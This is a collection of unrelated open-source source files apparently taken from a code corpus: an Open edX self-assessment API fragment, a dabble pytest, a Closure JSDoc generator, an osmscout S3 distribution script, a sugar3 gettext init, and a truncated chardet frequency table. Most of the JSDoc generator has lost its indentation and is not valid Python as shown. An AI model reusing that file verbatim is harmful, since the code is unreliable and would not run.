        ).format(submission_uuid)
        logger.exception(error_message)
        raise SelfAssessmentInternalError(error_message)

    # Return the serialized assessment
    return full_assessment_dict(assessment)
@transaction.commit_on_success
def _complete_assessment(
    submission_uuid,
    user_id,
    options_selected,
    criterion_feedback,
    overall_feedback,
    rubric_dict,
    scored_at
):
    """
    Internal function for creating an assessment and its parts atomically.

    The commit_on_success decorator rolls the whole assessment back if
    creating any of its parts fails.

    Args:
        submission_uuid (str): The unique identifier for the submission being
            assessed.
        user_id (str): The ID of the user creating the assessment. This must
            match the ID of the user who made the submission.
        options_selected (dict): Mapping of rubric criterion names to option
            values selected.
        criterion_feedback (dict): Dictionary mapping criterion names to the
            free-form text feedback the user gave for the criterion.
            Since criterion feedback is optional, some criteria may not appear
            in the dictionary.
        overall_feedback (unicode): Free-form text feedback on the submission overall.
        rubric_dict (dict): Serialized Rubric model.
        scored_at (datetime): The timestamp of the assessment.

    Returns:
        Assessment model
    """
    # Get or create the rubric
    rubric = rubric_from_dict(rubric_dict)

    # Create the self assessment
    assessment = Assessment.create(
        rubric,
        user_id,
        submission_uuid,
        SELF_TYPE,
        scored_at=scored_at,
        feedback=overall_feedback
    )

    # This will raise an `InvalidRubricSelection` if the selected options do not match the rubric.
    AssessmentPart.create_from_option_names(assessment, options_selected, feedback=criterion_feedback)
    return assessment
def get_assessment(submission_uuid):
    """
    Retrieve a self-assessment for a submission_uuid.

    Args:
        submission_uuid (str): The submission UUID for which we want
            self-assessment information.

    Returns:
        assessment (dict) is a serialized Assessment model, or None (if the user has not yet self-assessed)
        If multiple submissions or self-assessments are found, returns the most recent one.

    Raises:
        SelfAssessmentRequestError: submission_uuid was invalid.
    """
    # Retrieve assessments for the submission UUID
    # We weakly enforce that number of self-assessments per submission is <= 1,
    # but not at the database level. Someone could take advantage of the race condition
    # between checking the number of self-assessments and creating a new self-assessment.
    # To be safe, we retrieve just the most recent submission.
    serialized_assessments = serialize_assessments(Assessment.objects.filter(
        score_type=SELF_TYPE, submission_uuid=submission_uuid
    ).order_by('-scored_at')[:1])

    if not serialized_assessments:
        logger.info(
            u"No self-assessment found for submission {}".format(submission_uuid)
        )
        return None

    serialized_assessment = serialized_assessments[0]
    logger.info(u"Retrieved self-assessment for submission {}".format(submission_uuid))

    return serialized_assessment
def get_assessment_scores_by_criteria(submission_uuid):
    """Get the median score for each rubric criterion

    Args:
        submission_uuid (str): The submission uuid is used to get the
            assessments used to score this submission, and generate the
            appropriate median score.

    Returns:
        (dict): A dictionary of rubric criterion names, with a median score of
            the peer assessments.

    Raises:
        SelfAssessmentInternalError: If any error occurs while retrieving
            information to form the median scores, an error is raised.
    """
    try:
        # Only the most recent self-assessment is considered (list of <= 1),
        # so the "median" is effectively that assessment's scores.
        assessments = list(
            Assessment.objects.filter(
                score_type=SELF_TYPE, submission_uuid=submission_uuid
            ).order_by('-scored_at')[:1]
        )
        scores = Assessment.scores_by_criterion(assessments)
        return Assessment.get_median_score_dict(scores)
    except DatabaseError:
        error_message = (
            u"Error getting self assessment scores for submission {}"
        ).format(submission_uuid)
        logger.exception(error_message)
        raise SelfAssessmentInternalError(error_message)
def _log_assessment(assessment, submission):
    """
    Log the creation of a self-assessment.

    Args:
        assessment (Assessment): The assessment model.
        submission (dict): The serialized submission model.

    Returns:
        None
    """
    logger.info(
        u"Created self-assessment {assessment_id} for student {user} on "
        u"submission {submission_uuid}, course {course_id}, item {item_id} "
        u"with rubric {rubric_content_hash}"
        .format(
            assessment_id=assessment.id,
            user=submission['student_item']['student_id'],
            submission_uuid=submission['uuid'],
            course_id=submission['student_item']['course_id'],
            item_id=submission['student_item']['item_id'],
            rubric_content_hash=assessment.rubric.content_hash
        )
    )

    # Emit Datadog metrics tagged by course/item so dashboards can slice them.
    tags = [
        u"course_id:{course_id}".format(course_id=submission['student_item']['course_id']),
        u"item_id:{item_id}".format(item_id=submission['student_item']['item_id']),
        u"type:self"
    ]

    score_percentage = assessment.to_float()
    if score_percentage is not None:
        dog_stats_api.histogram('openassessment.assessment.score_percentage', score_percentage, tags=tags)

    dog_stats_api.increment('openassessment.assessment.count', tags=tags)
| agpl-3.0 |
Eigenstate/dabble | dabble/test/dor_abssel/test_dor_absolute_sel.py | 1 | 1915 | """
Tests absolute box size with ignored selection
"""
import os
import pytest
# NOTE(review): this module-level name shadows the builtin dir(); the test
# below relies on it, so renaming would need a coordinated change.
dir = os.path.dirname(__file__) + "/"
#==============================================================================
@pytest.mark.skip(reason="Missing input file")
def test_absolute_box(tmpdir):
    """
    Tests the absolute box size for a system with ligands far from
    the box
    """
    # Imports deferred so pytest collection works without vmd/dabble installed.
    from vmd import atomsel, molecule

    from dabble import DabbleBuilder

    # Build the system
    # NOTE: 'dir' is the module-level path constant (shadows the builtin).
    p = str(tmpdir)
    b = DabbleBuilder(solute_filename=os.path.join(dir, "dor_ligs.mae"),
                      output_filename=os.path.join(p, "test.mae"),
                      user_x=75., user_y=75., user_z=115.,
                      overwrite=True, tmp_dir=p,
                      exclude_sel="same fragment as resname FRAG")
    b.write()

    # Load the built system
    m2 = molecule.load("mae", os.path.join(p, "test.mae"))
    molecule.set_top(m2)

    # Check all the ligands are there
    assert len(set(atomsel("resname FRAG").residue)) == 3
#==============================================================================
#def test_absolute_box_noexclude(tmpdir):
# """
# Tests the absolute box size for a system with ligands far from
# the box, without using an exclude selection
# """
# from vmd import atomsel, molecule
#
# from dabble import DabbleBuilder
# p = str(tmpdir)
#
# # Building the system should raise a valueerror in sanity check
# # as resids are duplicated in protein chain
# with pytest.raises(ValueError):
# b = DabbleBuilder(solute_filename=os.path.join(dir, "dor_ligs.mae"),
# output_filename=os.path.join(p, "test.mae"),
# user_x=75., user_y=75., user_z=115.,
# overwrite=True, tmp_dir=p)
# b.write()
#
#==============================================================================
| gpl-2.0 |
polux/webPLM | public/javascripts/closure-library-read-only/closure/bin/labs/code/generate_jsdoc.py | 222 | 4318 | #!/usr/bin/env python
#
# Copyright 2013 The Closure Library Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tool to insert JsDoc before a function.
This script attempts to find the first function passed in to stdin, generate
JSDoc for it (with argument names and possibly return value), and inject
it in the string. This is intended to be used as a subprocess by editors
such as emacs and vi.
"""
import re
import sys
# Matches a typical Closure-style function definition.
_FUNCTION_REGEX = re.compile(r"""
# Start of line
^
# Indentation
(?P<indentation>[ ]*)
# Identifier (handling split across line)
(?P<identifier>\w+(\s*\.\s*\w+)*)
# "= function"
\s* = \s* function \s*
# opening paren
\(
# Function arguments
(?P<arguments>(?:\s|\w+|,)*)
# closing paren
\)
# opening bracket
\s* {
""", re.MULTILINE | re.VERBOSE)
def _MatchFirstFunction(script):
"""Match the first function seen in the script."""
return _FUNCTION_REGEX.search(script)
def _ParseArgString(arg_string):
"""Parse an argument string (inside parens) into parameter names."""
for arg in arg_string.split(','):
arg = arg.strip()
if arg:
yield arg
def _ExtractFunctionBody(script, indentation=0):
"""Attempt to return the function body."""
# Real extraction would require a token parser and state machines.
# We look for first bracket at the same level of indentation.
regex_str = r'{(.*?)^[ ]{%d}}' % indentation
function_regex = re.compile(regex_str, re.MULTILINE | re.DOTALL)
match = function_regex.search(script)
if match:
return match.group(1)
def _ContainsReturnValue(function_body):
"""Attempt to determine if the function body returns a value."""
return_regex = re.compile(r'\breturn\b[^;]')
# If this matches, we assume they're returning something.
return bool(return_regex.search(function_body))
def _InsertString(original_string, inserted_string, index):
"""Insert a string into another string at a given index."""
return original_string[0:index] + inserted_string + original_string[index:]
def _GenerateJsDoc(args, return_val=False):
"""Generate JSDoc for a function.
Args:
args: A list of names of the argument.
return_val: Whether the function has a return value.
Returns:
The JSDoc as a string.
"""
lines = []
lines.append('/**')
lines += [' * @param {} %s' % arg for arg in args]
if return_val:
lines.append(' * @return')
lines.append(' */')
return '\n'.join(lines) + '\n'
def _IndentString(source_string, indentation):
"""Indent string some number of characters."""
lines = [(indentation * ' ') + line
for line in source_string.splitlines(True)]
return ''.join(lines)
def InsertJsDoc(script):
  """Attempt to insert JSDoc for the first seen function in the script.

  Args:
    script: The script, as a string.

  Returns:
    Returns the new string if function was found and JSDoc inserted. Otherwise
    returns None.
  """
  function_match = _MatchFirstFunction(script)
  if not function_match:
    return

  # Parameter names for the @param lines.
  arg_names = _ParseArgString(function_match.group('arguments'))

  insert_index = function_match.start(0)
  indentation_width = len(function_match.group('indentation'))

  # Only emit @return when the body appears to return a value.
  has_return = False
  body = _ExtractFunctionBody(script[insert_index:], indentation_width)
  if body:
    has_return = _ContainsReturnValue(body)

  jsdoc = _GenerateJsDoc(arg_names, has_return)
  if indentation_width:
    jsdoc = _IndentString(jsdoc, indentation_width)
  return _InsertString(script, jsdoc, insert_index)
if __name__ == '__main__':
  # Filter mode: read a script on stdin and write the (possibly annotated)
  # version to stdout so editors can pipe buffers through this tool. On
  # failure to find a function, the input is echoed unchanged.
  stdin_script = sys.stdin.read()
  result = InsertJsDoc(stdin_script)
  if result:
    sys.stdout.write(result)
  else:
    sys.stdout.write(stdin_script)
| agpl-3.0 |
rinigus/osmscout-server | scripts/import/prepare_distribution.py | 1 | 5119 | #!/usr/bin/env python
# This script prepares files before uploading them for distribution
# This has to be run after all imports are finished
import json, pickle, os, stat, shutil
from mapbox_country_pack import world_pack as mapboxgl_world_pack
# Local directory holding all imported data sets to be uploaded.
root_dir = "distribution"
# Name of the target S3 bucket, kept in a one-line file next to this script.
bucket = open("bucket_name", "r").read().strip()
url_base = "http://data.modrana.org/osm_scout_server"
#url_base = "https://kuqrhldx.e24files.com"
# Remote directory name per data type; the trailing number is a format
# version that is bumped when the on-disk layout changes.
url_specs = {
    "base": url_base,
    "type": "url",
    #"osmscout": "osmscout-27",
    "geocoder_nlp": "geocoder-nlp-29",
    "postal_global": "postal-global-2",
    "postal_country": "postal-country-2",
    "mapnik_global": "mapnik-global-1",
    "mapnik_country": "mapnik-country-24",
    "mapboxgl_country": "mapboxgl-16",
    "mapboxgl_global": "mapboxgl-16",
    "mapboxgl_glyphs": "mapboxgl-16",
    "valhalla": "valhalla-24",
}
# Per-country distribution index produced by the import stage; the global
# (non-country) entries are appended below.
dist = json.loads( open("countries.json", "r").read() )
dist["postal/global"] = {
    "id": "postal/global",
    "type": "postal/global",
    "postal_global": { "path": "postal/global-v1" }
    }
dist["mapnik/global"] = {
    "id": "mapnik/global",
    "type": "mapnik/global",
    "mapnik_global": { "path": "mapnik/global" }
    }
dist["mapboxgl/glyphs"] = {
    "id": "mapboxgl/glyphs",
    "type": "mapboxgl/glyphs",
    "mapboxgl_glyphs": { "path": "mapboxgl/glyphs" }
    }
dist["url"] = url_specs
# could make it smarter in future to check whether the files have
# changed since the last upload
toupload = []   # [local_dir, remote_name] pairs queued by uploader()
# Shell script accumulated by uploader(); written out as uploader.sh below.
upload_commands = "#!/bin/bash\nset -e\nrm -f digest.md5\n"
def uploader(dirname, targetname, extra="/"):
    """Queue *dirname* for upload to S3 under *targetname*.

    Appends the pair to the module-level ``toupload`` list and extends the
    module-level ``upload_commands`` shell script with the md5 digest and
    ``s3cmd sync`` commands for this path.

    Args:
        dirname: local directory (or file) to upload.
        targetname: remote name/prefix inside the S3 bucket.
        extra: suffix appended to both paths; "/" for directories (the
            default), "" when syncing a single file.
    """
    global toupload, upload_commands
    toupload.append([dirname, targetname])
    upload_commands += "echo\necho " + dirname + "\n"
    # Escape "/" as "\/" so the paths can be embedded in the sed s/.../.../
    # expression below.  Raw strings are used because "\/" is an invalid
    # escape sequence that only worked by accident (and warns on modern
    # Python); r"\/" produces the identical two characters explicitly.
    sd = dirname.replace("/", r"\/")
    st = targetname.replace("/", r"\/")
    upload_commands += "md5deep -t -l -r " + dirname + " | sed 's/%s/%s/g' >> digest.md5\n" % (sd, st)
    upload_commands += "s3cmd --config=.s3cfg sync " + dirname + extra + " s3://" + bucket + "/" + targetname + extra + " --acl-public --signature-v2 " + "\n"
def getprop(dirname):
    """Read the sidecar property files written next to *dirname*.

    For each property P in size, size-compressed, timestamp and version the
    first whitespace-separated token of the file "<dirname>.P" is read.

    Args:
        dirname: base path of the data set (without the ".P" suffix).

    Returns:
        dict mapping property name to its value (as a string).
    """
    props = {}
    for p in ["size", "size-compressed", "timestamp", "version"]:
        # Use a context manager so the file handle is closed promptly
        # (the original left every handle to the garbage collector).
        with open(dirname + "." + p, "r") as f:
            props[p] = f.read().split()[0]
    return props
# fill database details: attach size/timestamp/version properties to every
# distributable item and queue its directory for upload
for d in dist:
    for sub in dist[d]:
        if "packages" in dist[d][sub]:
            continue # this item is distributed via packages
        try:
            rpath = dist[d][sub]["path"]
            print(rpath)
        except:
            # Intentional catch-all: dist[d] also holds plain string values
            # such as "id"/"type", for which ["path"] raises TypeError.
            continue
        locdir = root_dir + "/" + rpath
        remotedir = url_specs[sub] + "/" + rpath
        dist[d][sub].update( getprop(locdir) )
        uploader(locdir, remotedir)
# Queue the directories that are not covered by the per-country loop above.
uploader(root_dir + "/valhalla", url_specs["valhalla"] + "/valhalla")
uploader(root_dir + "/mapboxgl/packages", url_specs["mapboxgl_country"] + "/mapboxgl/packages")
# add mapbox global object after uploader commands are ready
dist["mapboxgl/global"] = {
    "id": "mapboxgl/global",
    "type": "mapboxgl/global",
    "mapboxgl_global": mapboxgl_world_pack()
    }
# save provided countries
fjson = open("provided/countries_provided.json", "w")
fjson.write( json.dumps( dist, sort_keys=True, indent=4, separators=(',', ': ')) )
fjson.close()
uploader("provided/countries_provided.json", "countries_provided.json", extra = "")
# Compress the accumulated digest (bzip2 removes the original digest.md5);
# the following uploader() call then appends a fresh digest.md5 holding the
# checksum of the .bz2 itself, which is renamed and uploaded as
# digest.md5.bz2.md5.
upload_commands += "bzip2 -f digest.md5\n"
uploader("digest.md5.bz2", "digest.md5.bz2", extra = "")
upload_commands += "echo\necho 'Set S3 permissions'\n"
upload_commands += "s3cmd --config=.s3cfg setacl s3://" + bucket + "/ --acl-public --recursive\n"
upload_commands += "mv digest.md5 digest.md5.bz2.md5\n"
uploader("digest.md5.bz2.md5", "digest.md5.bz2.md5", extra = "")
# save uploader script
fscript = open("uploader.sh", "w")
fscript.write( upload_commands )
fscript.write( "echo\necho 'Set S3 permissions'\n" )
fscript.write( "s3cmd --config=.s3cfg setacl s3://" + bucket + "/ --acl-public --recursive\n" )
# NOTE(review): the bucket root is first made public recursively, then the
# bucket itself private -- presumably deliberate; confirm the intent.
fscript.write( "s3cmd --config=.s3cfg setacl s3://" + bucket + "/ --acl-private\n" )
fscript.close()
# Make the generated script executable for its owner.
st = os.stat('uploader.sh')
os.chmod('uploader.sh', st.st_mode | stat.S_IEXEC)
print("Check uploader script and run it")
# generate public_html folder for testing: a symlink tree that mimics the
# remote bucket layout so a local web server can serve it
testing_mirror = "public_http"
shutil.rmtree(testing_mirror, ignore_errors=True)
os.mkdir(testing_mirror)
os.symlink("../provided/countries_provided.json",
           os.path.join(testing_mirror, "countries_provided.json"))
# Maps each url_specs key to the subdirectory of ./distribution it serves.
distlink = { "geocoder_nlp": "geocoder-nlp",
             "mapboxgl_country": "mapboxgl",
             "mapnik_country": "mapnik",
             "mapnik_global": "mapnik",
             #"osmscout": "osmscout",
             "postal_country": "postal",
             "postal_global": "postal",
             "valhalla": "valhalla" }
# Create one versioned directory per data type and link the matching
# distribution subdirectory into it.
for t in ["geocoder_nlp", "mapboxgl_country",
          "mapnik_country", "mapnik_global",
          #"osmscout",
          "postal_country", "postal_global", "valhalla" ]:
    d = os.path.join(testing_mirror, url_specs[t])
    os.mkdir(d)
    os.symlink( "../../distribution/" + distlink[t], os.path.join(d, distlink[t]) )
| gpl-3.0 |
ceibal-tatu/sugar-toolkit-gtk3 | src/sugar3/__init__.py | 5 | 1048 | # Copyright (C) 2006-2007, Red Hat, Inc.
# Copyright (C) 2007-2008, One Laptop Per Child
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc., 59 Temple Place - Suite 330,
# Boston, MA 02111-1307, USA.
import os
import gettext

# Locale files live under $SUGAR_PREFIX/share/locale; fall back to the
# system prefix /usr when the environment variable is not set.
prefix = os.environ.get('SUGAR_PREFIX', '/usr')
locale_path = os.path.join(prefix, 'share', 'locale')
gettext.bindtextdomain('sugar-base', locale_path)
| lgpl-2.1 |
Microsoft/PTVS | Python/Product/Miniconda/Miniconda3-x64/Lib/site-packages/pip/_vendor/chardet/jpcntx.py | 289 | 19643 | ######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
# This is hiragana 2-char sequence table, the number in each cell represents its frequency category
# (0 = never observed .. 5 = very frequent).  Row/column indices are the
# hiragana "orders" produced by get_order() below (second byte - 0x9F for
# Shift_JIS, second byte - 0xA1 for EUC-JP); feed() indexes it as
# jp2CharContext[previous_order][current_order].
# Presumably machine-generated from a corpus -- do not edit by hand.
jp2CharContext = (
(0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1),
(2,4,0,4,0,3,0,4,0,3,4,4,4,2,4,3,3,4,3,2,3,3,4,2,3,3,3,2,4,1,4,3,3,1,5,4,3,4,3,4,3,5,3,0,3,5,4,2,0,3,1,0,3,3,0,3,3,0,1,1,0,4,3,0,3,3,0,4,0,2,0,3,5,5,5,5,4,0,4,1,0,3,4),
(0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2),
(0,4,0,5,0,5,0,4,0,4,5,4,4,3,5,3,5,1,5,3,4,3,4,4,3,4,3,3,4,3,5,4,4,3,5,5,3,5,5,5,3,5,5,3,4,5,5,3,1,3,2,0,3,4,0,4,2,0,4,2,1,5,3,2,3,5,0,4,0,2,0,5,4,4,5,4,5,0,4,0,0,4,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,4,0,3,0,3,0,4,5,4,3,3,3,3,4,3,5,4,4,3,5,4,4,3,4,3,4,4,4,4,5,3,4,4,3,4,5,5,4,5,5,1,4,5,4,3,0,3,3,1,3,3,0,4,4,0,3,3,1,5,3,3,3,5,0,4,0,3,0,4,4,3,4,3,3,0,4,1,1,3,4),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,4,0,3,0,3,0,4,0,3,4,4,3,2,2,1,2,1,3,1,3,3,3,3,3,4,3,1,3,3,5,3,3,0,4,3,0,5,4,3,3,5,4,4,3,4,4,5,0,1,2,0,1,2,0,2,2,0,1,0,0,5,2,2,1,4,0,3,0,1,0,4,4,3,5,4,3,0,2,1,0,4,3),
(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0),
(0,3,0,5,0,4,0,2,1,4,4,2,4,1,4,2,4,2,4,3,3,3,4,3,3,3,3,1,4,2,3,3,3,1,4,4,1,1,1,4,3,3,2,0,2,4,3,2,0,3,3,0,3,1,1,0,0,0,3,3,0,4,2,2,3,4,0,4,0,3,0,4,4,5,3,4,4,0,3,0,0,1,4),
(1,4,0,4,0,4,0,4,0,3,5,4,4,3,4,3,5,4,3,3,4,3,5,4,4,4,4,3,4,2,4,3,3,1,5,4,3,2,4,5,4,5,5,4,4,5,4,4,0,3,2,2,3,3,0,4,3,1,3,2,1,4,3,3,4,5,0,3,0,2,0,4,5,5,4,5,4,0,4,0,0,5,4),
(0,5,0,5,0,4,0,3,0,4,4,3,4,3,3,3,4,0,4,4,4,3,4,3,4,3,3,1,4,2,4,3,4,0,5,4,1,4,5,4,4,5,3,2,4,3,4,3,2,4,1,3,3,3,2,3,2,0,4,3,3,4,3,3,3,4,0,4,0,3,0,4,5,4,4,4,3,0,4,1,0,1,3),
(0,3,1,4,0,3,0,2,0,3,4,4,3,1,4,2,3,3,4,3,4,3,4,3,4,4,3,2,3,1,5,4,4,1,4,4,3,5,4,4,3,5,5,4,3,4,4,3,1,2,3,1,2,2,0,3,2,0,3,1,0,5,3,3,3,4,3,3,3,3,4,4,4,4,5,4,2,0,3,3,2,4,3),
(0,2,0,3,0,1,0,1,0,0,3,2,0,0,2,0,1,0,2,1,3,3,3,1,2,3,1,0,1,0,4,2,1,1,3,3,0,4,3,3,1,4,3,3,0,3,3,2,0,0,0,0,1,0,0,2,0,0,0,0,0,4,1,0,2,3,2,2,2,1,3,3,3,4,4,3,2,0,3,1,0,3,3),
(0,4,0,4,0,3,0,3,0,4,4,4,3,3,3,3,3,3,4,3,4,2,4,3,4,3,3,2,4,3,4,5,4,1,4,5,3,5,4,5,3,5,4,0,3,5,5,3,1,3,3,2,2,3,0,3,4,1,3,3,2,4,3,3,3,4,0,4,0,3,0,4,5,4,4,5,3,0,4,1,0,3,4),
(0,2,0,3,0,3,0,0,0,2,2,2,1,0,1,0,0,0,3,0,3,0,3,0,1,3,1,0,3,1,3,3,3,1,3,3,3,0,1,3,1,3,4,0,0,3,1,1,0,3,2,0,0,0,0,1,3,0,1,0,0,3,3,2,0,3,0,0,0,0,0,3,4,3,4,3,3,0,3,0,0,2,3),
(2,3,0,3,0,2,0,1,0,3,3,4,3,1,3,1,1,1,3,1,4,3,4,3,3,3,0,0,3,1,5,4,3,1,4,3,2,5,5,4,4,4,4,3,3,4,4,4,0,2,1,1,3,2,0,1,2,0,0,1,0,4,1,3,3,3,0,3,0,1,0,4,4,4,5,5,3,0,2,0,0,4,4),
(0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3),
(0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5),
(0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3),
(2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5),
(0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4),
(1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4),
(0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3),
(0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3),
(0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3),
(0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5),
(0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4),
(0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5),
(0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3),
(0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4),
(0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4),
(0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4),
(0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1),
